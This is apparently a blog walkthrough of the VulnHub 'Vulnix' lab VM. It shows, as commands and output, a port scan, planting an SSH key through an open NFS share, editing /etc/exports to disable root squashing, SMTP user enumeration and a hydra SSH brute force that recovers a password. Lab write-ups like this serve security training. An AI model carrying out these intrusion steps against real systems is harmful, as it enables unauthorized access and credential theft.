HackLAB: Vulnix
15 Apr 2019 | WalkthroughsVulnHub URL: https://www.vulnhub.com/entry/hacklab-vulnix,48/
Hostname: vulnix
IP Address: 10.183.0.191
Information Gathering/Recon
The IP address is obtained via DHCP at boot. In my case, the IP is 10.183.0.191.
Service Enumeration/Scanning
root@kali:~/Walkthroughs/vulnix# nmap -Pn -sT -sV -sC -A -oA vulnix -p 1-65535 10.183.0.191
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 23:33 EDT
Nmap scan report for vulnix.homenet.dom (10.183.0.191)
Host is up (0.0029s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh
OpenSSH 5.9p1
Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-04-25T03:34:55+00:00; +6s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA STLS SASL PIPELINING UIDL TOP RESP-CODES
|_ssl-date: 2019-04-25T03:34:55+00:00; +6s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48766/udp mountd
| 100005 1,2,3 52406/tcp mountd
| 100021 1,3,4 40343/udp nlockmgr
| 100021 1,3,4 59897/tcp nlockmgr
| 100024 1 39331/tcp status
| 100024 1 52861/udp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: OK IDLE IMAP4rev1 SASL-IR more have post-login LOGIN-REFERRALS capabilities Pre-login listed STARTTLS ID LITERAL+ ENABLE LOGINDISABLEDA0001
|_ssl-date: 2019-04-25T03:34:55+00:00; +6s from scanner time.
512/tcp open exec?
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
|_ssl-date: 2019-04-25T03:34:54+00:00; +6s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019-04-25T03:34:54+00:00; +6s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
39331/tcp open status 1 (RPC #100024)
46571/tcp open mountd 1-3 (RPC #100005)
51367/tcp open mountd 1-3 (RPC #100005)
52406/tcp open mountd 1-3 (RPC #100005)
59897/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FC:C6:E7 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
TRACEROUTE
HOP RTT ADDRESS
1 2.93 ms vulnix.homenet.dom (10.183.0.191)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.93 seconds
Gaining Access
Wow! Lots of services to look into. And, unlike most, no web services. The likely "most vulnerable" service we see is NFS/RPC. Let's see what is available using showmount.
root@kali:~/Walkthroughs/vulnix# showmount -e 10.183.0.191
Export list for 10.183.0.191:
/home/vulnix *
Great! We already see a wide open NFS share. Let's mount it and see what's inside (and if root squashing is enabled).
root@kali:~/Walkthroughs/vulnix# mkdir -p nfs/home-vulnix
root@kali:~/Walkthroughs/vulnix# cd nfs
root@kali:~/Walkthroughs/vulnix/nfs# mount -t nfs 10.183.0.191:/home/vulnix home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# ls -l
total 4
drwxr-x--- 2 nobody 4294967294 4096 Sep 2 2012 home-vulnix
Looks like the permissions for the export aren't going to allow us to just browse through. Let's unmount the export and remount using nfspy.
root@kali:~/Walkthroughs/vulnix/nfs# umount home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# nfspy -o server=10.183.0.191:/home/vulnix,hide,allow_other,rw,intr home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# ls -l
total 4
drwxr-x--- 2 2008 2008 4096 Sep 2 2012 home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# cd home-vulnix/
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix# ls -a
. .. .bash_logout .bashrc .profile
This time we were able to mount it and view the UID/GID for the user (2008/2008). Based on the home directory name, I'll assume this is the UID/GID for the user vulnix. Let's use the finger service that is available to see if that user exists.
root@kali:~/Walkthroughs/vulnix# finger vulnix@10.183.0.191
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Sure enough. The next thing to do would be see if we can create SSH keys in the user's home directory and login as them. Before that, we'll take a quick peak into the hidden files already in the directory. Checking each of the files, they don't contain anything of interest.
Let's see if we can create a .ssh directory and authorized_keys file.
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix# cd .ssh
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix/.ssh# cp ../../../vulnix.pub authorized_keys
cp: failed to preserve ownership for 'authorized_keys': Operation not permitted
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix/.ssh# ls -l
total 1
-rw------- 1 2008 2008 391 Apr 25 06:57 authorized_keys
Looking good so far. Let's try to SSH to the server as vulnix.
root@kali:~/Walkthroughs/vulnix# ssh -i vulnix vulnix@10.183.0.191
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Thu Apr 25 12:00:11 BST 2019
System load: 0.0 Processes: 93
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 10.183.0.191
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
vulnix@vulnix:~$
We are in! 😄
Maintaining Access
Since we have SSH access, I skipped this step.
Privilege Escalation
Checking the kernel version using uname -a. There aren't any known exploits for this version of the kernel.
vulnix@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
The NFS export has root_squash enabled, so we won't be able to escalate using the NFS share.
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
Or can we... checking sudo permissions, it looks like we can edit the /etc/exports file using sudoedit.
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
The problem is, how do we restart the nfs service after we make the changes. You have to be root to restart services and/or reboot... or do you. According to this article, you can set the following values and force a hard reboot.
Guess we can try it...
But first, we'll edit the exports file to turn off root squashing.
Because I'm working in 'screen', I had to make some terminal adjustments to get sudoedit to work. Also, the default editor was nano, so I changed it to vim.
vulnix@vulnix:~$ export TERM=xterm
vulnix@vulnix:~$ export SUDO_EDITOR=/usr/bin/vim
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
Now, for the "magic" commands...
vulnix@vulnix:~$ echo 1 > /proc/sys/kernel/sysrq
-bash: /proc/sys/kernel/sysrq: Permission denied
vulnix@vulnix:~$ echo b > /proc/sysrq-trigger
-bash: /proc/sysrq-trigger: Permission denied
So much for that.
Since having to reboot the box seems lame to me, I'm going to stop here. If you want to escalate after a reboot, just follow the steps in hackfest2016 : Orcus.
Pivoting
N/A
Clean Up
Additional Info
SMTP VRFY
The SMTP service supports the VRFY command, so we can try to enumerate valid accounts by running smtp-user-enum.
root@kali:~/Walkthroughs/vulnix# smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.tx
t -t 10.183.0.191 -m 15
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 15
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 21169
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Apr 25 00:57:06 2019 #########
10.183.0.191: backup exists
10.183.0.191: BACKUP exists
10.183.0.191: BIN exists
10.183.0.191: bin exists
10.183.0.191: daemon exists
10.183.0.191: DAEMON exists
10.183.0.191: dovecot exists
10.183.0.191: dovenull exists
10.183.0.191: games exists
10.183.0.191: GAMES exists
10.183.0.191: gnats exists
10.183.0.191: irc exists
10.183.0.191: landscape exists
10.183.0.191: libuuid exists
10.183.0.191: list exists
10.183.0.191: lp exists
10.183.0.191: MAIL exists
10.183.0.191: mail exists
10.183.0.191: man exists
10.183.0.191: messagebus exists
10.183.0.191: news exists
10.183.0.191: NOBODY exists
10.183.0.191: nobody exists
10.183.0.191: postfix exists
10.183.0.191: POSTFIX exists
10.183.0.191: postmaster exists
10.183.0.191: PROXY exists
10.183.0.191: proxy exists
10.183.0.191: ROOT exists
10.183.0.191: root exists
10.183.0.191: sshd exists
10.183.0.191: SSHD exists
10.183.0.191: statd exists
10.183.0.191: SYNC exists
10.183.0.191: sync exists
10.183.0.191: sys exists
10.183.0.191: syslog exists
10.183.0.191: user exists
10.183.0.191: User exists
10.183.0.191: USER exists
10.183.0.191: uucp exists
10.183.0.191: UUCP exists
10.183.0.191: whoopsie exists
10.183.0.191: www-data exists
######## Scan completed at Thu Apr 25 00:58:01 2019 #########
44 results.
21169 queries in 55 seconds (384.9 queries / sec)
This produced the following list of unique users:
-
backup
-
bin
-
daemon
-
dovecot
-
dovenull
-
games
-
gnats
-
irc
-
landscape
-
libuuid
-
list
-
lp
-
mail
-
man
-
messagebus
-
news
-
nobody
-
postfix
-
postmaster
-
proxy
-
root
-
sshd
-
statd
-
sync
-
sys
-
syslog
-
user
-
uucp
-
whoopsie
-
www-data
Obviously the 'whoopsie' account stands out (along with some others).
Let's use the finger service to try to get information about each of these user accounts. We'll write a script to finger each user account and redirect the output to a file.
root@kali:~/Walkthroughs/vulnix# cat finger-all
#!/bin/bash
finger backup@10.183.0.191
finger bin@10.183.0.191
finger daemon@10.183.0.191
finger dovecot@10.183.0.191
finger dovenull@10.183.0.191
finger games@10.183.0.191
finger gnats@10.183.0.191
finger irc@10.183.0.191
finger landscape@10.183.0.191
finger libuuid@10.183.0.191
finger list@10.183.0.191
finger lp@10.183.0.191
finger mail@10.183.0.191
finger man@10.183.0.191
finger messagebus@10.183.0.191
finger news@10.183.0.191
finger nobody@10.183.0.191
finger postfix@10.183.0.191
finger postmaster@10.183.0.191
finger proxy@10.183.0.191
finger root@10.183.0.191
finger sshd@10.183.0.191
finger statd@10.183.0.191
finger sync@10.183.0.191
finger sys@10.183.0.191
finger syslog@10.183.0.191
finger user@10.183.0.191
finger uucp@10.183.0.191
finger whoopsie@10.183.0.191
finger www-data@10.183.0.191
root@kali:~/Walkthroughs/vulnix# chmod +x finger-all
root@kali:~/Walkthroughs/vulnix# ./finger-all > finger-all-results.txt
root@kali:~/Walkthroughs/vulnix# finger vulnix@10.183.0.191 >> finger-all-results.txt
Based on the /home/vulnix directory we saw exported through NFS, we thought we'd finger them as well and add them to the file. The most useful information we gleaned from finger was which users have a login shell defined. This lets us know which accounts we might want to try to brute force using SSH. That list includes:
-
backup
-
bin
-
daemon
-
games
-
gnats
-
irc
-
libuuid
-
list
-
lp
-
mail
-
man
-
news
-
nobody
-
proxy
-
root
-
sys
-
user
-
uucp
-
vulnix
-
www-data
We are going to pull together a handful of wordlists and create a "master" list to use to try to crack some passwords. We'll use hydra to try to brute force the SSH service.
root@kali:~/Walkthroughs/vulnix# cat /usr/share/seclists/Passwords/probable-v2-top207.txt \
> /usr/share/seclists/Passwords/darkweb2017-top1000.txt \
> /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
> /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
> /usr/share/seclists/Passwords/Common-Credentials/common-passwords-win.txt \
> /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt | sort -u > wordlist.txt
Before using a wordlist though, we'll see if any users have a simple password variation of their username as a password. Maybe we'll get lucky.
root@kali:~/Walkthroughs/vulnix# hydra -o ssh-crack -t 4 -L ssh-users -u -e nsr ssh://10.183.0.191
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-04-25 01:26:55
[DATA] max 4 tasks per 1 server, overall 4 tasks, 60 login tries (l:20/p:3), ~15 tries per task
[DATA] attacking ssh://10.183.0.191:22/
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-04-25 01:27:15
Nope! Time to use the wordlist. We'll start with a simple one.
root@kali:~/Walkthroughs/vulnix# hydra -o ssh-crack -t 4 -L ssh-users -u -e nsr -P /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ssh://10.183.0.191
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-04-25 06:44:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 480 login tries (l:20/p:24), ~120 tries per task
[DATA] attacking ssh://10.183.0.191:22/
[STATUS] 141.00 tries/min, 141 tries in 00:01h, 339 to do in 00:03h, 4 active
[STATUS] 126.00 tries/min, 378 tries in 00:03h, 102 to do in 00:01h, 4 active
[22][ssh] host: 10.183.0.191 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-04-25 06:48:20
Looks like we found a vulnerable account.